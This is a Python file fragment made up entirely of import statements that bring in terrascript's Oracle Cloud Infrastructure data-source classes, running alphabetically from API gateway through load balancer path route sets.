from terrascript.data.hashicorp.oci import oci_apigateway_certificate
from terrascript.data.hashicorp.oci import oci_apigateway_certificates
from terrascript.data.hashicorp.oci import oci_apigateway_deployment
from terrascript.data.hashicorp.oci import oci_apigateway_deployments
from terrascript.data.hashicorp.oci import oci_apigateway_gateway
from terrascript.data.hashicorp.oci import oci_apigateway_gateways
from terrascript.data.hashicorp.oci import oci_apm_apm_domain
from terrascript.data.hashicorp.oci import oci_apm_apm_domains
from terrascript.data.hashicorp.oci import oci_apm_data_keys
from terrascript.data.hashicorp.oci import oci_apm_synthetics_monitor
from terrascript.data.hashicorp.oci import oci_apm_synthetics_monitors
from terrascript.data.hashicorp.oci import oci_apm_synthetics_public_vantage_point
from terrascript.data.hashicorp.oci import oci_apm_synthetics_public_vantage_points
from terrascript.data.hashicorp.oci import oci_apm_synthetics_result
from terrascript.data.hashicorp.oci import oci_apm_synthetics_script
from terrascript.data.hashicorp.oci import oci_apm_synthetics_scripts
from terrascript.data.hashicorp.oci import oci_artifacts_container_configuration
from terrascript.data.hashicorp.oci import oci_artifacts_container_image
from terrascript.data.hashicorp.oci import oci_artifacts_container_image_signature
from terrascript.data.hashicorp.oci import oci_artifacts_container_image_signatures
from terrascript.data.hashicorp.oci import oci_artifacts_container_images
from terrascript.data.hashicorp.oci import oci_artifacts_container_repositories
from terrascript.data.hashicorp.oci import oci_artifacts_container_repository
from terrascript.data.hashicorp.oci import oci_artifacts_generic_artifact
from terrascript.data.hashicorp.oci import oci_artifacts_generic_artifacts
from terrascript.data.hashicorp.oci import oci_artifacts_repositories
from terrascript.data.hashicorp.oci import oci_artifacts_repository
from terrascript.data.hashicorp.oci import oci_audit_configuration
from terrascript.data.hashicorp.oci import oci_audit_events
from terrascript.data.hashicorp.oci import (
oci_autoscaling_auto_scaling_configuration,
)
from terrascript.data.hashicorp.oci import (
oci_autoscaling_auto_scaling_configurations,
)
from terrascript.data.hashicorp.oci import oci_bastion_bastion
from terrascript.data.hashicorp.oci import oci_bastion_bastions
from terrascript.data.hashicorp.oci import oci_bastion_session
from terrascript.data.hashicorp.oci import oci_bastion_sessions
from terrascript.data.hashicorp.oci import oci_bds_auto_scaling_configuration
from terrascript.data.hashicorp.oci import oci_bds_auto_scaling_configurations
from terrascript.data.hashicorp.oci import oci_bds_bds_instance
from terrascript.data.hashicorp.oci import oci_bds_bds_instances
from terrascript.data.hashicorp.oci import oci_blockchain_blockchain_platform
from terrascript.data.hashicorp.oci import oci_blockchain_blockchain_platforms
from terrascript.data.hashicorp.oci import oci_blockchain_osn
from terrascript.data.hashicorp.oci import oci_blockchain_osns
from terrascript.data.hashicorp.oci import oci_blockchain_peer
from terrascript.data.hashicorp.oci import oci_blockchain_peers
from terrascript.data.hashicorp.oci import oci_budget_alert_rule
from terrascript.data.hashicorp.oci import oci_budget_alert_rules
from terrascript.data.hashicorp.oci import oci_budget_budget
from terrascript.data.hashicorp.oci import oci_budget_budgets
from terrascript.data.hashicorp.oci import oci_cloud_guard_cloud_guard_configuration
from terrascript.data.hashicorp.oci import oci_cloud_guard_data_mask_rule
from terrascript.data.hashicorp.oci import oci_cloud_guard_data_mask_rules
from terrascript.data.hashicorp.oci import oci_cloud_guard_detector_recipe
from terrascript.data.hashicorp.oci import oci_cloud_guard_detector_recipes
from terrascript.data.hashicorp.oci import oci_cloud_guard_managed_list
from terrascript.data.hashicorp.oci import oci_cloud_guard_managed_lists
from terrascript.data.hashicorp.oci import oci_cloud_guard_responder_recipe
from terrascript.data.hashicorp.oci import oci_cloud_guard_responder_recipes
from terrascript.data.hashicorp.oci import oci_cloud_guard_target
from terrascript.data.hashicorp.oci import oci_cloud_guard_targets
from terrascript.data.hashicorp.oci import (
oci_computeinstanceagent_instance_agent_plugin,
)
from terrascript.data.hashicorp.oci import (
oci_computeinstanceagent_instance_agent_plugins,
)
from terrascript.data.hashicorp.oci import (
oci_computeinstanceagent_instance_available_plugins,
)
from terrascript.data.hashicorp.oci import oci_containerengine_cluster_kube_config
from terrascript.data.hashicorp.oci import oci_containerengine_cluster_option
from terrascript.data.hashicorp.oci import oci_containerengine_clusters
from terrascript.data.hashicorp.oci import (
oci_containerengine_migrate_to_native_vcn_status,
)
from terrascript.data.hashicorp.oci import oci_containerengine_node_pool
from terrascript.data.hashicorp.oci import oci_containerengine_node_pool_option
from terrascript.data.hashicorp.oci import oci_containerengine_node_pools
from terrascript.data.hashicorp.oci import oci_containerengine_work_request_errors
from terrascript.data.hashicorp.oci import (
oci_containerengine_work_request_log_entries,
)
from terrascript.data.hashicorp.oci import oci_containerengine_work_requests
from terrascript.data.hashicorp.oci import oci_core_app_catalog_listing
from terrascript.data.hashicorp.oci import (
oci_core_app_catalog_listing_resource_version,
)
from terrascript.data.hashicorp.oci import (
oci_core_app_catalog_listing_resource_versions,
)
from terrascript.data.hashicorp.oci import oci_core_app_catalog_listings
from terrascript.data.hashicorp.oci import oci_core_app_catalog_subscriptions
from terrascript.data.hashicorp.oci import oci_core_block_volume_replica
from terrascript.data.hashicorp.oci import oci_core_block_volume_replicas
from terrascript.data.hashicorp.oci import oci_core_boot_volume
from terrascript.data.hashicorp.oci import oci_core_boot_volume_attachments
from terrascript.data.hashicorp.oci import oci_core_boot_volume_backup
from terrascript.data.hashicorp.oci import oci_core_boot_volume_backups
from terrascript.data.hashicorp.oci import oci_core_boot_volume_replica
from terrascript.data.hashicorp.oci import oci_core_boot_volume_replicas
from terrascript.data.hashicorp.oci import oci_core_boot_volumes
from terrascript.data.hashicorp.oci import oci_core_byoip_allocated_ranges
from terrascript.data.hashicorp.oci import oci_core_byoip_range
from terrascript.data.hashicorp.oci import oci_core_byoip_ranges
from terrascript.data.hashicorp.oci import oci_core_cluster_network
from terrascript.data.hashicorp.oci import oci_core_cluster_network_instances
from terrascript.data.hashicorp.oci import oci_core_cluster_networks
from terrascript.data.hashicorp.oci import oci_core_compute_capacity_reservation
from terrascript.data.hashicorp.oci import (
oci_core_compute_capacity_reservation_instance_shapes,
)
from terrascript.data.hashicorp.oci import (
oci_core_compute_capacity_reservation_instances,
)
from terrascript.data.hashicorp.oci import oci_core_compute_capacity_reservations
from terrascript.data.hashicorp.oci import (
oci_core_compute_global_image_capability_schema,
)
from terrascript.data.hashicorp.oci import (
oci_core_compute_global_image_capability_schemas,
)
from terrascript.data.hashicorp.oci import (
oci_core_compute_global_image_capability_schemas_version,
)
from terrascript.data.hashicorp.oci import (
oci_core_compute_global_image_capability_schemas_versions,
)
from terrascript.data.hashicorp.oci import oci_core_compute_image_capability_schema
from terrascript.data.hashicorp.oci import oci_core_compute_image_capability_schemas
from terrascript.data.hashicorp.oci import oci_core_console_histories
from terrascript.data.hashicorp.oci import oci_core_console_history_data
from terrascript.data.hashicorp.oci import oci_core_cpe_device_shape
from terrascript.data.hashicorp.oci import oci_core_cpe_device_shapes
from terrascript.data.hashicorp.oci import oci_core_cpes
from terrascript.data.hashicorp.oci import oci_core_cross_connect
from terrascript.data.hashicorp.oci import oci_core_cross_connect_group
from terrascript.data.hashicorp.oci import oci_core_cross_connect_groups
from terrascript.data.hashicorp.oci import oci_core_cross_connect_locations
from terrascript.data.hashicorp.oci import oci_core_cross_connect_port_speed_shapes
from terrascript.data.hashicorp.oci import oci_core_cross_connect_status
from terrascript.data.hashicorp.oci import oci_core_cross_connects
from terrascript.data.hashicorp.oci import oci_core_dedicated_vm_host
from terrascript.data.hashicorp.oci import (
oci_core_dedicated_vm_host_instance_shapes,
)
from terrascript.data.hashicorp.oci import oci_core_dedicated_vm_host_shapes
from terrascript.data.hashicorp.oci import oci_core_dedicated_vm_hosts
from terrascript.data.hashicorp.oci import oci_core_dedicated_vm_hosts_instances
from terrascript.data.hashicorp.oci import oci_core_dhcp_options
from terrascript.data.hashicorp.oci import oci_core_drg_attachments
from terrascript.data.hashicorp.oci import oci_core_drg_route_distribution
from terrascript.data.hashicorp.oci import (
oci_core_drg_route_distribution_statements,
)
from terrascript.data.hashicorp.oci import oci_core_drg_route_distributions
from terrascript.data.hashicorp.oci import oci_core_drg_route_table
from terrascript.data.hashicorp.oci import oci_core_drg_route_table_route_rules
from terrascript.data.hashicorp.oci import oci_core_drg_route_tables
from terrascript.data.hashicorp.oci import oci_core_drgs
from terrascript.data.hashicorp.oci import oci_core_fast_connect_provider_service
from terrascript.data.hashicorp.oci import (
oci_core_fast_connect_provider_service_key,
)
from terrascript.data.hashicorp.oci import oci_core_fast_connect_provider_services
from terrascript.data.hashicorp.oci import oci_core_image
from terrascript.data.hashicorp.oci import oci_core_image_shape
from terrascript.data.hashicorp.oci import oci_core_image_shapes
from terrascript.data.hashicorp.oci import oci_core_images
from terrascript.data.hashicorp.oci import oci_core_instance
from terrascript.data.hashicorp.oci import oci_core_instance_configuration
from terrascript.data.hashicorp.oci import oci_core_instance_configurations
from terrascript.data.hashicorp.oci import oci_core_instance_console_connections
from terrascript.data.hashicorp.oci import oci_core_instance_credentials
from terrascript.data.hashicorp.oci import oci_core_instance_devices
from terrascript.data.hashicorp.oci import oci_core_instance_measured_boot_report
from terrascript.data.hashicorp.oci import oci_core_instance_pool
from terrascript.data.hashicorp.oci import oci_core_instance_pool_instances
from terrascript.data.hashicorp.oci import (
oci_core_instance_pool_load_balancer_attachment,
)
from terrascript.data.hashicorp.oci import oci_core_instance_pools
from terrascript.data.hashicorp.oci import oci_core_instances
from terrascript.data.hashicorp.oci import oci_core_internet_gateways
from terrascript.data.hashicorp.oci import oci_core_ipsec_config
from terrascript.data.hashicorp.oci import oci_core_ipsec_connection_tunnel
from terrascript.data.hashicorp.oci import oci_core_ipsec_connection_tunnels
from terrascript.data.hashicorp.oci import oci_core_ipsec_connections
from terrascript.data.hashicorp.oci import oci_core_ipsec_status
from terrascript.data.hashicorp.oci import oci_core_ipv6
from terrascript.data.hashicorp.oci import oci_core_ipv6s
from terrascript.data.hashicorp.oci import oci_core_letter_of_authority
from terrascript.data.hashicorp.oci import oci_core_listing_resource_version
from terrascript.data.hashicorp.oci import oci_core_listing_resource_versions
from terrascript.data.hashicorp.oci import oci_core_local_peering_gateways
from terrascript.data.hashicorp.oci import oci_core_nat_gateway
from terrascript.data.hashicorp.oci import oci_core_nat_gateways
from terrascript.data.hashicorp.oci import oci_core_network_security_group
from terrascript.data.hashicorp.oci import (
oci_core_network_security_group_security_rules,
)
from terrascript.data.hashicorp.oci import oci_core_network_security_group_vnics
from terrascript.data.hashicorp.oci import oci_core_network_security_groups
from terrascript.data.hashicorp.oci import oci_core_peer_region_for_remote_peerings
from terrascript.data.hashicorp.oci import oci_core_private_ip
from terrascript.data.hashicorp.oci import oci_core_private_ips
from terrascript.data.hashicorp.oci import oci_core_public_ip
from terrascript.data.hashicorp.oci import oci_core_public_ip_pool
from terrascript.data.hashicorp.oci import oci_core_public_ip_pools
from terrascript.data.hashicorp.oci import oci_core_public_ips
from terrascript.data.hashicorp.oci import oci_core_remote_peering_connections
from terrascript.data.hashicorp.oci import oci_core_route_tables
from terrascript.data.hashicorp.oci import oci_core_security_lists
from terrascript.data.hashicorp.oci import oci_core_service_gateways
from terrascript.data.hashicorp.oci import oci_core_services
from terrascript.data.hashicorp.oci import oci_core_shape
from terrascript.data.hashicorp.oci import oci_core_shapes
from terrascript.data.hashicorp.oci import oci_core_subnet
from terrascript.data.hashicorp.oci import oci_core_subnets
from terrascript.data.hashicorp.oci import oci_core_vcn
from terrascript.data.hashicorp.oci import oci_core_vcn_dns_resolver_association
from terrascript.data.hashicorp.oci import oci_core_vcns
from terrascript.data.hashicorp.oci import oci_core_virtual_circuit
from terrascript.data.hashicorp.oci import oci_core_virtual_circuit_bandwidth_shapes
from terrascript.data.hashicorp.oci import oci_core_virtual_circuit_public_prefixes
from terrascript.data.hashicorp.oci import oci_core_virtual_circuits
from terrascript.data.hashicorp.oci import oci_core_virtual_networks
from terrascript.data.hashicorp.oci import oci_core_vlan
from terrascript.data.hashicorp.oci import oci_core_vlans
from terrascript.data.hashicorp.oci import oci_core_vnic
from terrascript.data.hashicorp.oci import oci_core_vnic_attachments
from terrascript.data.hashicorp.oci import oci_core_volume
from terrascript.data.hashicorp.oci import oci_core_volume_attachments
from terrascript.data.hashicorp.oci import oci_core_volume_backup_policies
from terrascript.data.hashicorp.oci import oci_core_volume_backup_policy_assignments
from terrascript.data.hashicorp.oci import oci_core_volume_backups
from terrascript.data.hashicorp.oci import oci_core_volume_group_backups
from terrascript.data.hashicorp.oci import oci_core_volume_groups
from terrascript.data.hashicorp.oci import oci_core_volumes
from terrascript.data.hashicorp.oci import oci_data_safe_data_safe_configuration
from terrascript.data.hashicorp.oci import oci_data_safe_data_safe_private_endpoint
from terrascript.data.hashicorp.oci import oci_data_safe_data_safe_private_endpoints
from terrascript.data.hashicorp.oci import oci_data_safe_on_prem_connector
from terrascript.data.hashicorp.oci import oci_data_safe_on_prem_connectors
from terrascript.data.hashicorp.oci import oci_data_safe_target_database
from terrascript.data.hashicorp.oci import oci_data_safe_target_databases
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_container_database,
)
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_container_database_dataguard_association,
)
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_container_database_dataguard_associations,
)
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_container_databases,
)
from terrascript.data.hashicorp.oci import oci_database_autonomous_container_patches
from terrascript.data.hashicorp.oci import oci_database_autonomous_database
from terrascript.data.hashicorp.oci import oci_database_autonomous_database_backup
from terrascript.data.hashicorp.oci import oci_database_autonomous_database_backups
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_database_dataguard_association,
)
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_database_dataguard_associations,
)
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_database_instance_wallet_management,
)
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_database_regional_wallet_management,
)
from terrascript.data.hashicorp.oci import oci_database_autonomous_database_wallet
from terrascript.data.hashicorp.oci import oci_database_autonomous_databases
from terrascript.data.hashicorp.oci import oci_database_autonomous_databases_clones
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_db_preview_versions,
)
from terrascript.data.hashicorp.oci import oci_database_autonomous_db_versions
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_exadata_infrastructure,
)
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_exadata_infrastructure_ocpu,
)
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_exadata_infrastructure_shapes,
)
from terrascript.data.hashicorp.oci import (
oci_database_autonomous_exadata_infrastructures,
)
from terrascript.data.hashicorp.oci import oci_database_autonomous_patch
from terrascript.data.hashicorp.oci import oci_database_autonomous_vm_cluster
from terrascript.data.hashicorp.oci import oci_database_autonomous_vm_clusters
from terrascript.data.hashicorp.oci import oci_database_backup_destination
from terrascript.data.hashicorp.oci import oci_database_backup_destinations
from terrascript.data.hashicorp.oci import oci_database_backups
from terrascript.data.hashicorp.oci import oci_database_cloud_exadata_infrastructure
from terrascript.data.hashicorp.oci import (
oci_database_cloud_exadata_infrastructures,
)
from terrascript.data.hashicorp.oci import oci_database_cloud_vm_cluster
from terrascript.data.hashicorp.oci import oci_database_cloud_vm_clusters
from terrascript.data.hashicorp.oci import oci_database_data_guard_association
from terrascript.data.hashicorp.oci import oci_database_data_guard_associations
from terrascript.data.hashicorp.oci import oci_database_database
from terrascript.data.hashicorp.oci import oci_database_database_software_image
from terrascript.data.hashicorp.oci import oci_database_database_software_images
from terrascript.data.hashicorp.oci import (
oci_database_database_upgrade_history_entries,
)
from terrascript.data.hashicorp.oci import (
oci_database_database_upgrade_history_entry,
)
from terrascript.data.hashicorp.oci import oci_database_databases
from terrascript.data.hashicorp.oci import oci_database_db_home
from terrascript.data.hashicorp.oci import (
oci_database_db_home_patch_history_entries,
)
from terrascript.data.hashicorp.oci import oci_database_db_home_patches
from terrascript.data.hashicorp.oci import oci_database_db_homes
from terrascript.data.hashicorp.oci import oci_database_db_node
from terrascript.data.hashicorp.oci import oci_database_db_node_console_connection
from terrascript.data.hashicorp.oci import oci_database_db_node_console_connections
from terrascript.data.hashicorp.oci import oci_database_db_nodes
from terrascript.data.hashicorp.oci import (
oci_database_db_system_patch_history_entries,
)
from terrascript.data.hashicorp.oci import oci_database_db_system_patches
from terrascript.data.hashicorp.oci import oci_database_db_system_shapes
from terrascript.data.hashicorp.oci import oci_database_db_systems
from terrascript.data.hashicorp.oci import oci_database_db_versions
from terrascript.data.hashicorp.oci import oci_database_exadata_infrastructure
from terrascript.data.hashicorp.oci import (
oci_database_exadata_infrastructure_download_config_file,
)
from terrascript.data.hashicorp.oci import oci_database_exadata_infrastructures
from terrascript.data.hashicorp.oci import oci_database_exadata_iorm_config
from terrascript.data.hashicorp.oci import oci_database_external_container_database
from terrascript.data.hashicorp.oci import oci_database_external_container_databases
from terrascript.data.hashicorp.oci import oci_database_external_database_connector
from terrascript.data.hashicorp.oci import oci_database_external_database_connectors
from terrascript.data.hashicorp.oci import (
oci_database_external_non_container_database,
)
from terrascript.data.hashicorp.oci import (
oci_database_external_non_container_databases,
)
from terrascript.data.hashicorp.oci import oci_database_external_pluggable_database
from terrascript.data.hashicorp.oci import oci_database_external_pluggable_databases
from terrascript.data.hashicorp.oci import oci_database_flex_components
from terrascript.data.hashicorp.oci import oci_database_gi_versions
from terrascript.data.hashicorp.oci import oci_database_key_store
from terrascript.data.hashicorp.oci import oci_database_key_stores
from terrascript.data.hashicorp.oci import oci_database_maintenance_run
from terrascript.data.hashicorp.oci import oci_database_maintenance_runs
from terrascript.data.hashicorp.oci import (
oci_database_management_db_management_private_endpoint,
)
from terrascript.data.hashicorp.oci import (
oci_database_management_db_management_private_endpoint_associated_database,
)
from terrascript.data.hashicorp.oci import (
oci_database_management_db_management_private_endpoint_associated_databases,
)
from terrascript.data.hashicorp.oci import (
oci_database_management_db_management_private_endpoints,
)
from terrascript.data.hashicorp.oci import oci_database_management_managed_database
from terrascript.data.hashicorp.oci import (
oci_database_management_managed_database_group,
)
from terrascript.data.hashicorp.oci import (
oci_database_management_managed_database_groups,
)
from terrascript.data.hashicorp.oci import oci_database_management_managed_databases
from terrascript.data.hashicorp.oci import (
oci_database_management_managed_databases_database_parameter,
)
from terrascript.data.hashicorp.oci import (
oci_database_management_managed_databases_database_parameters,
)
from terrascript.data.hashicorp.oci import oci_database_migration_agent
from terrascript.data.hashicorp.oci import oci_database_migration_agent_images
from terrascript.data.hashicorp.oci import oci_database_migration_agents
from terrascript.data.hashicorp.oci import oci_database_migration_connection
from terrascript.data.hashicorp.oci import oci_database_migration_connections
from terrascript.data.hashicorp.oci import oci_database_migration_job
from terrascript.data.hashicorp.oci import oci_database_migration_jobs
from terrascript.data.hashicorp.oci import oci_database_migration_migration
from terrascript.data.hashicorp.oci import oci_database_migration_migrations
from terrascript.data.hashicorp.oci import oci_database_pluggable_database
from terrascript.data.hashicorp.oci import oci_database_pluggable_databases
from terrascript.data.hashicorp.oci import oci_database_vm_cluster
from terrascript.data.hashicorp.oci import oci_database_vm_cluster_network
from terrascript.data.hashicorp.oci import (
oci_database_vm_cluster_network_download_config_file,
)
from terrascript.data.hashicorp.oci import oci_database_vm_cluster_networks
from terrascript.data.hashicorp.oci import oci_database_vm_cluster_patch
from terrascript.data.hashicorp.oci import (
oci_database_vm_cluster_patch_history_entries,
)
from terrascript.data.hashicorp.oci import (
oci_database_vm_cluster_patch_history_entry,
)
from terrascript.data.hashicorp.oci import oci_database_vm_cluster_patches
from terrascript.data.hashicorp.oci import (
oci_database_vm_cluster_recommended_network,
)
from terrascript.data.hashicorp.oci import oci_database_vm_cluster_update
from terrascript.data.hashicorp.oci import (
oci_database_vm_cluster_update_history_entries,
)
from terrascript.data.hashicorp.oci import (
oci_database_vm_cluster_update_history_entry,
)
from terrascript.data.hashicorp.oci import oci_database_vm_cluster_updates
from terrascript.data.hashicorp.oci import oci_database_vm_clusters
from terrascript.data.hashicorp.oci import oci_datacatalog_catalog
from terrascript.data.hashicorp.oci import oci_datacatalog_catalog_private_endpoint
from terrascript.data.hashicorp.oci import oci_datacatalog_catalog_private_endpoints
from terrascript.data.hashicorp.oci import oci_datacatalog_catalog_type
from terrascript.data.hashicorp.oci import oci_datacatalog_catalog_types
from terrascript.data.hashicorp.oci import oci_datacatalog_catalogs
from terrascript.data.hashicorp.oci import oci_datacatalog_connection
from terrascript.data.hashicorp.oci import oci_datacatalog_connections
from terrascript.data.hashicorp.oci import oci_datacatalog_data_asset
from terrascript.data.hashicorp.oci import oci_datacatalog_data_assets
from terrascript.data.hashicorp.oci import oci_datacatalog_metastore
from terrascript.data.hashicorp.oci import oci_datacatalog_metastores
from terrascript.data.hashicorp.oci import oci_dataflow_application
from terrascript.data.hashicorp.oci import oci_dataflow_applications
from terrascript.data.hashicorp.oci import oci_dataflow_invoke_run
from terrascript.data.hashicorp.oci import oci_dataflow_invoke_runs
from terrascript.data.hashicorp.oci import oci_dataflow_private_endpoint
from terrascript.data.hashicorp.oci import oci_dataflow_private_endpoints
from terrascript.data.hashicorp.oci import oci_dataflow_run_log
from terrascript.data.hashicorp.oci import oci_dataflow_run_logs
from terrascript.data.hashicorp.oci import oci_dataintegration_workspace
from terrascript.data.hashicorp.oci import oci_dataintegration_workspaces
from terrascript.data.hashicorp.oci import oci_datascience_job
from terrascript.data.hashicorp.oci import oci_datascience_job_run
from terrascript.data.hashicorp.oci import oci_datascience_job_runs
from terrascript.data.hashicorp.oci import oci_datascience_job_shapes
from terrascript.data.hashicorp.oci import oci_datascience_jobs
from terrascript.data.hashicorp.oci import oci_datascience_model
from terrascript.data.hashicorp.oci import oci_datascience_model_deployment
from terrascript.data.hashicorp.oci import oci_datascience_model_deployment_shapes
from terrascript.data.hashicorp.oci import oci_datascience_model_deployments
from terrascript.data.hashicorp.oci import oci_datascience_model_provenance
from terrascript.data.hashicorp.oci import oci_datascience_models
from terrascript.data.hashicorp.oci import oci_datascience_notebook_session
from terrascript.data.hashicorp.oci import oci_datascience_notebook_session_shapes
from terrascript.data.hashicorp.oci import oci_datascience_notebook_sessions
from terrascript.data.hashicorp.oci import oci_datascience_project
from terrascript.data.hashicorp.oci import oci_datascience_projects
from terrascript.data.hashicorp.oci import oci_devops_deploy_artifact
from terrascript.data.hashicorp.oci import oci_devops_deploy_artifacts
from terrascript.data.hashicorp.oci import oci_devops_deploy_environment
from terrascript.data.hashicorp.oci import oci_devops_deploy_environments
from terrascript.data.hashicorp.oci import oci_devops_deploy_pipeline
from terrascript.data.hashicorp.oci import oci_devops_deploy_pipelines
from terrascript.data.hashicorp.oci import oci_devops_deploy_stage
from terrascript.data.hashicorp.oci import oci_devops_deploy_stages
from terrascript.data.hashicorp.oci import oci_devops_deployment
from terrascript.data.hashicorp.oci import oci_devops_deployments
from terrascript.data.hashicorp.oci import oci_devops_project
from terrascript.data.hashicorp.oci import oci_devops_projects
from terrascript.data.hashicorp.oci import oci_dns_records
from terrascript.data.hashicorp.oci import oci_dns_resolver
from terrascript.data.hashicorp.oci import oci_dns_resolver_endpoint
from terrascript.data.hashicorp.oci import oci_dns_resolver_endpoints
from terrascript.data.hashicorp.oci import oci_dns_resolvers
from terrascript.data.hashicorp.oci import oci_dns_rrset
from terrascript.data.hashicorp.oci import oci_dns_steering_policies
from terrascript.data.hashicorp.oci import oci_dns_steering_policy
from terrascript.data.hashicorp.oci import oci_dns_steering_policy_attachment
from terrascript.data.hashicorp.oci import oci_dns_steering_policy_attachments
from terrascript.data.hashicorp.oci import oci_dns_tsig_key
from terrascript.data.hashicorp.oci import oci_dns_tsig_keys
from terrascript.data.hashicorp.oci import oci_dns_view
from terrascript.data.hashicorp.oci import oci_dns_views
from terrascript.data.hashicorp.oci import oci_dns_zones
from terrascript.data.hashicorp.oci import oci_email_dkim
from terrascript.data.hashicorp.oci import oci_email_dkims
from terrascript.data.hashicorp.oci import oci_email_email_domain
from terrascript.data.hashicorp.oci import oci_email_email_domains
from terrascript.data.hashicorp.oci import oci_email_sender
from terrascript.data.hashicorp.oci import oci_email_senders
from terrascript.data.hashicorp.oci import oci_email_suppression
from terrascript.data.hashicorp.oci import oci_email_suppressions
from terrascript.data.hashicorp.oci import oci_events_rule
from terrascript.data.hashicorp.oci import oci_events_rules
from terrascript.data.hashicorp.oci import oci_file_storage_export_sets
from terrascript.data.hashicorp.oci import oci_file_storage_exports
from terrascript.data.hashicorp.oci import oci_file_storage_file_systems
from terrascript.data.hashicorp.oci import oci_file_storage_mount_targets
from terrascript.data.hashicorp.oci import oci_file_storage_snapshot
from terrascript.data.hashicorp.oci import oci_file_storage_snapshots
from terrascript.data.hashicorp.oci import oci_functions_application
from terrascript.data.hashicorp.oci import oci_functions_applications
from terrascript.data.hashicorp.oci import oci_functions_function
from terrascript.data.hashicorp.oci import oci_functions_functions
from terrascript.data.hashicorp.oci import (
oci_generic_artifacts_content_artifact_by_path,
)
from terrascript.data.hashicorp.oci import (
oci_generic_artifacts_content_generic_artifacts_content,
)
from terrascript.data.hashicorp.oci import oci_golden_gate_database_registration
from terrascript.data.hashicorp.oci import oci_golden_gate_database_registrations
from terrascript.data.hashicorp.oci import oci_golden_gate_deployment
from terrascript.data.hashicorp.oci import oci_golden_gate_deployment_backup
from terrascript.data.hashicorp.oci import oci_golden_gate_deployment_backups
from terrascript.data.hashicorp.oci import oci_golden_gate_deployments
from terrascript.data.hashicorp.oci import oci_health_checks_http_monitor
from terrascript.data.hashicorp.oci import oci_health_checks_http_monitors
from terrascript.data.hashicorp.oci import oci_health_checks_http_probe_results
from terrascript.data.hashicorp.oci import oci_health_checks_ping_monitor
from terrascript.data.hashicorp.oci import oci_health_checks_ping_monitors
from terrascript.data.hashicorp.oci import oci_health_checks_ping_probe_results
from terrascript.data.hashicorp.oci import oci_health_checks_vantage_points
from terrascript.data.hashicorp.oci import oci_identity_api_keys
from terrascript.data.hashicorp.oci import oci_identity_auth_tokens
from terrascript.data.hashicorp.oci import oci_identity_authentication_policy
from terrascript.data.hashicorp.oci import oci_identity_availability_domain
from terrascript.data.hashicorp.oci import oci_identity_availability_domains
from terrascript.data.hashicorp.oci import oci_identity_compartment
from terrascript.data.hashicorp.oci import oci_identity_compartments
from terrascript.data.hashicorp.oci import oci_identity_cost_tracking_tags
from terrascript.data.hashicorp.oci import oci_identity_customer_secret_keys
from terrascript.data.hashicorp.oci import oci_identity_dynamic_groups
from terrascript.data.hashicorp.oci import oci_identity_fault_domains
from terrascript.data.hashicorp.oci import oci_identity_group
from terrascript.data.hashicorp.oci import oci_identity_groups
from terrascript.data.hashicorp.oci import oci_identity_identity_provider_groups
from terrascript.data.hashicorp.oci import oci_identity_identity_providers
from terrascript.data.hashicorp.oci import oci_identity_idp_group_mappings
from terrascript.data.hashicorp.oci import oci_identity_network_source
from terrascript.data.hashicorp.oci import oci_identity_network_sources
from terrascript.data.hashicorp.oci import oci_identity_policies
from terrascript.data.hashicorp.oci import oci_identity_region_subscriptions
from terrascript.data.hashicorp.oci import oci_identity_regions
from terrascript.data.hashicorp.oci import oci_identity_smtp_credentials
from terrascript.data.hashicorp.oci import oci_identity_swift_passwords
from terrascript.data.hashicorp.oci import oci_identity_tag
from terrascript.data.hashicorp.oci import oci_identity_tag_default
from terrascript.data.hashicorp.oci import oci_identity_tag_defaults
from terrascript.data.hashicorp.oci import oci_identity_tag_namespaces
from terrascript.data.hashicorp.oci import oci_identity_tags
from terrascript.data.hashicorp.oci import oci_identity_tenancy
from terrascript.data.hashicorp.oci import oci_identity_ui_password
from terrascript.data.hashicorp.oci import oci_identity_user
from terrascript.data.hashicorp.oci import oci_identity_user_group_memberships
from terrascript.data.hashicorp.oci import oci_identity_users
from terrascript.data.hashicorp.oci import oci_integration_integration_instance
from terrascript.data.hashicorp.oci import oci_integration_integration_instances
from terrascript.data.hashicorp.oci import oci_jms_fleet
from terrascript.data.hashicorp.oci import oci_jms_fleets
from terrascript.data.hashicorp.oci import oci_kms_decrypted_data
from terrascript.data.hashicorp.oci import oci_kms_encrypted_data
from terrascript.data.hashicorp.oci import oci_kms_key
from terrascript.data.hashicorp.oci import oci_kms_key_version
from terrascript.data.hashicorp.oci import oci_kms_key_versions
from terrascript.data.hashicorp.oci import oci_kms_keys
from terrascript.data.hashicorp.oci import oci_kms_replication_status
from terrascript.data.hashicorp.oci import oci_kms_vault
from terrascript.data.hashicorp.oci import oci_kms_vault_replicas
from terrascript.data.hashicorp.oci import oci_kms_vault_usage
from terrascript.data.hashicorp.oci import oci_kms_vaults
from terrascript.data.hashicorp.oci import oci_limits_limit_definitions
from terrascript.data.hashicorp.oci import oci_limits_limit_values
from terrascript.data.hashicorp.oci import oci_limits_quota
from terrascript.data.hashicorp.oci import oci_limits_quotas
from terrascript.data.hashicorp.oci import oci_limits_resource_availability
from terrascript.data.hashicorp.oci import oci_limits_services
from terrascript.data.hashicorp.oci import oci_load_balancer_backend_health
from terrascript.data.hashicorp.oci import oci_load_balancer_backend_set_health
from terrascript.data.hashicorp.oci import oci_load_balancer_backend_sets
from terrascript.data.hashicorp.oci import oci_load_balancer_backends
from terrascript.data.hashicorp.oci import oci_load_balancer_backendsets
from terrascript.data.hashicorp.oci import oci_load_balancer_certificates
from terrascript.data.hashicorp.oci import oci_load_balancer_health
from terrascript.data.hashicorp.oci import oci_load_balancer_hostnames
from terrascript.data.hashicorp.oci import oci_load_balancer_listener_rules
from terrascript.data.hashicorp.oci import (
oci_load_balancer_load_balancer_routing_policies,
)
from terrascript.data.hashicorp.oci import (
oci_load_balancer_load_balancer_routing_policy,
)
from terrascript.data.hashicorp.oci import oci_load_balancer_load_balancers
from terrascript.data.hashicorp.oci import oci_load_balancer_path_route_sets
